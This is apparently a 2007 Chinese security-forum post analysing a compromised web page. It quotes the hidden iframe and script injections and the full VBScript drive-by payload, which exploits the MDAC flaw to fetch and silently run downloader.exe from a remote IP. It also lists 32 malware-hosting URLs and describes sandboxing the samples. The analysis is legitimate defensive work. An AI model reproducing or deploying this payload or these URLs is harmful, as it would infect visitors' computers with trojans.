- <script language="javascript" src="http://count23.51yes.com/click.aspx?id=233356760&logo=1"></script>
- <iframe src='http://59.34.197.239/in.asp?newwebname=1077' width='0' height='0' frameborder='0'></iframe>
- <script language="javascript" src="http://59.34.197.239/in.js"></script>
- <DIV style="DISPLAY: none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/579660.js"></script></DIV>
- <script language="javascript" type="text/javascript" src="http://js.users.51.la/552570.js"></script>
复制代码
这个http://www.1717kan.cn/index_1077.asp里面的内容,一共镶嵌了四个网页,其中有问题的是http://59.34.197.239/in.js这个js文件:
- document.write('<script language="VBScript">');
- document.write(':on error resume next');
- document.write(':dl="http://203.171.236.215/downloader.exe"');
- document.write(':fname1="downloader.exe"');
- document.write (':sub shellexe(fname1)')
- document.write(':set Q = df.createobject("Shell.Application","")');
- document.write(':Q.ShellExecute fname1,"","","open",0');
- document.write (':end sub')
- document.write(': Set df = document.createElement("object")');
- document.write(' : df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"');
- document.write(': set SS = df.createobject("Adodb.Stream","")');
- document.write(' : SS.type = 1');
- document.write(':set F = df.createobject("Scripting.FileSystemObject","")');
- document.write(' : set tmp = F.GetSpecialFolder(2)');
- document.write(' : fname1= F.BuildPath(tmp,fname1)');
- document.write(' : SS.open');
- document.write(' : Set getexe = df.CreateObject("Microsoft."&"XMLHTTP","")');
- document.write(':getexe.Open "GET", dl, False');
- document.write(' : getexe.Send');
- document.write(' : SS.write getexe.responseBody');
- document.write(' : SS.savetofile fname1,2');
- document.write(' : SS.close');
- document.write(' : call shellexe(fname1)');
- document.write(' </script>');
复制代码
首先利用MDAC功能中的漏洞可能允许执行代码 (911562)这个经典漏洞下载http://203.171.236.215/downloader.exe这个文件,卡巴没有报,但从名字看来是一个下载者
接着就是这个js文件里面的核心部分了,一共镶嵌了32个网页!估计都是挂马网页或者镶嵌其他挂马网页或者两种都有,太多了没有那么多精力去一个一个分析了
- http://go.ipcenter.cn/81308.asp
- http://go.ipcenter.cn/maya777.asp
- http://ip.8dunet.com/esdys.asp
- http://ma.new9991.com/360/1022.htm
- http://julong.ip8868.cn/hkjulong.asp
- http://www3.winopen.cn/800uc.asp
- http://go.ipcenter.cn/6262561.asp
- http://go.bannerbox.cn/602532116.asp
- http://www1.sowz.com.cn/server.asp
- http://www1.sowz.com.cn/ad.asp
- http://go.ipcenter.cn/zt920.asp
- http://ip.ipunion.cn/i114.asp
- http://www1.sowz.com.cn/news.asp
- http://www1.sowz.com.cn/solution.asp
- http://www1.sowz.com.cn/case.asp
- http://www1.sowz.com.cn/storage.asp
- http://www1.sowz.com.cn/sheshi.asp
- http://www.f1ash8.net/pepsi.asp
- http://go.ipcenter.cn/26secom.asp
- http://go.ipcenter.cn/fzzvv.asp
- http://go.ipcenter.cn/15641651.asp
- http://59.34.197.239/0013exe.htm
- http://www1.winopen.cn/fpjyw1.asp
- http://go.bannerbox.cn/zewq8861.asp
- http://go.ipcenter.cn/chqyswin.asp
- http://www1.winopen.cn/41ip111.asp
- http://go.bannerbox.cn/dasuanbai.asp
- http://go1.ipcenter.cn/id511.asp
- http://ip.adanywhere.cn/open1.asp
- http://www1.winopen.cn/community.asp
- http://tugood.ip8868.cn/tugood.asp
- http://www1.sowz.com.cn/index.asp
复制代码
用虚拟机+嗅探器的方式把他们下载的毒都找出来吧
这东西还真是老实不客气啊!首先下载了好几个流氓和木马,弹出一些奇怪的网页,然后这些东西就继续下载其他的流氓和病毒,造成连锁反应!还弹出N个对话框,害我的虚拟机徘徊在死机的边缘
排除卡巴已经报的,并筛选了一些,还有大约3.6MB的样本(其中有流氓、病毒和网马……),看了上传的话要联系版主了,但样本区貌似还没有版主啊
[ 本帖最后由 dikex 于 2007-1-18 21:38 编辑 ] |